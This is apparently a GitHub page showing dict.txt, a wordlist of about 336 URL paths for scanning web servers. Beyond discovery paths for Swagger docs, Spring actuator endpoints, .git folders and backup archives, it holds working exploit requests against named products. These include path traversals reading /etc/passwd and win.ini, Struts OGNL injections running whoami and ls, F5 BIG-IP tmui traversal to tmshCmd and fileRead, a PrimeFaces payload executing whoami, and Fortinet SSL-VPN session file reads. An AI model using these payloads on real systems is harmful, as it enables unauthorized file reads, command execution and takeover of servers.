-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathdict.txt
336 lines (336 loc) · 12.6 KB
/
dict.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
/v2/api-docs
/swagger-ui.html
/seeyon/thirdpartyController.do
/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/
/Videos/anything/hls/m/..\data\jellyfin.db
/page/exportImport/uploadOperation.jsp
/Upload/upload_file.php?l=1
/log
/alarmConfig
/axis2/SOAPMonitor
/oa/setup/license.jsp
/oa/setup/
/uploads/user
/manage/log
/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
/invoker/JMXInvokerServlet
/api/v4/ci/lint
/config/getuser?index=0
/api/settings/values
/users/sign_in
/domain
/register/toDownload.do?fileName=
/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh
/nacos/v1/auth/users
/core/api/wopi/index.php?access_token=1&action=contents&path=
/directdata/direct/router
/systemLog/downFile.php?fileName=
/host
/api/webservices/list
/swagger
/solr
/solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd
/phpmyadmin
/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=
/api-getModel-api-sql-sql=
/solr/db/replication\?command=fetchindex\&masterUrl=
/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip
/scripts/setup.php
/readme.php
/README
/changelog.php
/pma
/Change
/Documetation.html
/Documetation.txt
translators.html
/seeyon/index.jsp
/api/swagger
/Swagger/ui/index
/api/swaggerui
/swagger/ui
/WebReport/ReportServer?op=plugin_logdb&cmd=test&driver=com.mysql.jdbc.Driver&url=jdbc:mysql://114.114.114.114:9999/finelog_bbpt?useUnicode=true&characterEncoding=UTF-8&username=public&password=123
/api/swagger/ui
/api/swagger-ui.html
/xfservlet/XFireServlet/LuceneWebService
/officeserver.jsp
/weaver/bsh.servlet.BshServlet/
/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=
/user/swagger-ui.html
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id
/manageSystem/login
/runtime/log
/services/
/apiws/services/
/mailsms/s?func=ADMIN:appState&dumpConfig=/
/LC/system?op=plugin_logdb&cmd=test&driver=com.mysql.jdbc.Driver&url=jdbc:mysql://114.114.114.114:9999/finelog_bbpt?useUnicode=true&characterEncoding=UTF-8&username=public&password=123
/MgmtCenter/applet/lib/ServerCommandStationServlet
/lunkr/cache/;/;/../../manager.html
/webinst/action.jsp
/./apiws/services/
/api/dp/rptsvcsyncpoint?ccid=1
/uddiexplorer/SetupUDDIExplorer.jsp
/uddiexplorer/index.jsp
/uddi/uddilistener
/ueditor/
/api/dbstat/gettablessize
/ws/
/plus/flink.php?dopost=save
/plus/users_products.php?oid=1337
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afWindows%c0%afwin.ini
/plus/download.php?aid=1337
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
/plus/showphoto.php?aid=1337
/plus/users-do.php?fmdo=sendMail
/plus/posttocar.php?id=1337
/Orion/invalid.aspx.js
/plus/vote.php?dopost=view
/plus/carbuyaction.php?do=clickout
/plus/recommend.php
/weaver/weaver.file.SignatureDownLoad?markId=1
/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
/libs/swagger/ui
/swagger/index.html
/server-properties.jsp
/swagger-resources/configuration/ui
/mobile/dbconfigreader.jsp
/cpt/manage/validate.jsp
/swagger-resources/configuration/security
/api.html
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/admin/student/studentlist.html?page=1
/druid/index.html
/shterm/listener/tui_update.php
/admin/druid/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/oozie/docs/index.html
/oozie
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/api-docs
/api/doc
/index.html#/analysis/alarms
/analysis/alarms
/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/portal
/api/edr/sanforinter/v2/cssp/slog_client?token=ssskbkds
/docs/
/mobile/plugin/SyncUserInfo.jsp
/alarms
/trace
/metrics
/heapdump
/threaddump
/dump
/auditevents
/beans
/Runtime/Logs
/jolokia
/cloudfoundryapplication
/hystrix.stream
/actuator
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
/officeserverservlet
/defaultroot/officeserverservlet
/monitor
/monitor/auditevents
/monitor/beans
/monitor/health
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/info
/monitor/loggers
/monitor/heapdump
/monitor/threaddump
/monitor/metrics
/monitor/scheduledtasks
/monitor/httptrace
/monitor/mappings
/monitor/jolokia
/monitor/hystrix.stream
/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333
/weaver/bsh.servlet.BshServlet
/uai/download/uploadfileToPath.htm
/?module=auth_user&action=mod_edit_pwd
/nagiosxi/index.php
/seeyon/htmlofficeservlet
/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
/was5/web/tree?treefile=
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/log/c.php?strip_slashes=system&host=id
/tool/log/c.php?strip_slashes=system&host=id
/ui/login.php?user=admin
/v2/api/product/manger/getInfo
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/login_check.php
/acc/clsf/report/datasource.php
/Proxy
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=&fileExt=txt
/file/fileNoLogin/
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
/cgi-bin/php-cgi/html/redirect.php?-s
/webapi/v1/system/accountmanage/account
/uts_v2/webstatic/#/passport/login
/webapi/v1/authen_user
/doc.html
/tmui/login.jsp
/v1/api-docs
/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php
/ispirit/login_code.php
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/v3/api-docs
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=a
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
/admin.html?s=admin/api.Update/node
/cat/r
/admin.html?s=admin/api.Update/get/encode/
/imc/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
/cat/s
/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/cat/s/login
/esp/cms_changeDeviceContext.esp
/index.php?r=test/sss&data=
/php/utils/router.php/Administrator.get
/examples
/messageType.do
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/jobmanager/logs/
/jobmanager
/client.do
/examples/servlets/servlet/CookieExample
/examples/servlets/servlet/RequestHeaderExample
/examples/jsp/snp/snoop.jsp
/examples/async/async1
/service/~/xbr/XbrlPersistenceServlet
/esp/cms_changeDeviceContext.esp?device=1024:bbbb
/examples/servlets
/examples/websocket/index.xhtml
/examples/jsp/
/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid
/console
/console/login/LoginForm.jsp
/console/css/%252e%252e%252fconsole.portal
/run
/test/run
/ws_utc
/ws_utc/config.do
/.git/config
/user/register
/pma
/user/login
/dolphinscheduler/users/update
/job/save
/job/list
/job/run?jobId=
/instance/detail?instanceId=
/prod-api/druid/
/stage-api/druid/
/agent2/.idea/workspace.xml
/info
audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
/loggers
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/remote/fgt_lang?lang=
/health
/webadm/?q=moni_detail.do&action=gragh
/remote/error?errmsg=123
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23123
/remote/login?lang=en
/cgi-bin/main.cgi?oper=getrsc
/cgi-bin/main.cgi?oper=tomain&showwhat=showres
/cgi-bin/main.cgi?oper=modpwd
/actuator/env
/refresh
/mappings
/actuator/refresh
/autoconfig
/info.json
/features
/configprops
/beans
/admin/user/pwd/?id=
/.git
/api/download?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2fetc%2fpasswd
/api/token
/test.html
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action
/doUpload.action
/integration/editGangster.action
/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test
/oauth/authorize?response_type=token&client_id=acme&redirect_uri=${2*2}
/test
/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/FCKeditor/editor/filemanager/connectors/test.html
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/_samples/default.html
/admin/FCKeditor/_samples/default.html
/fckeditor/editor/fckeditor.html
/admin/fckeditor/editor/fckeditor.html
/fckeditor/
/admin/fckeditor/
/admin/lib/fckeditor/editor/dialog/fck_about.html
/fckeditor/editor/dialog/fck_about.html
/admin/fckeditor/editor/dialog/fck_about.html
/admin/lib/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=
/robots.txt
/index.html
/index.php
/index.action
/index.jsp
/admin/index.php
/admin/index
/.svn/wc.db
/.svn
/.ds_store
/reg
/registe
/regist
/ROOT.7z
/ROOT.rar
/ROOT.tar
/ROOT.tar.gz
/ROOT.war
/ROOT.zip
/web.tar
/web.tar.gz
/web.rar
/register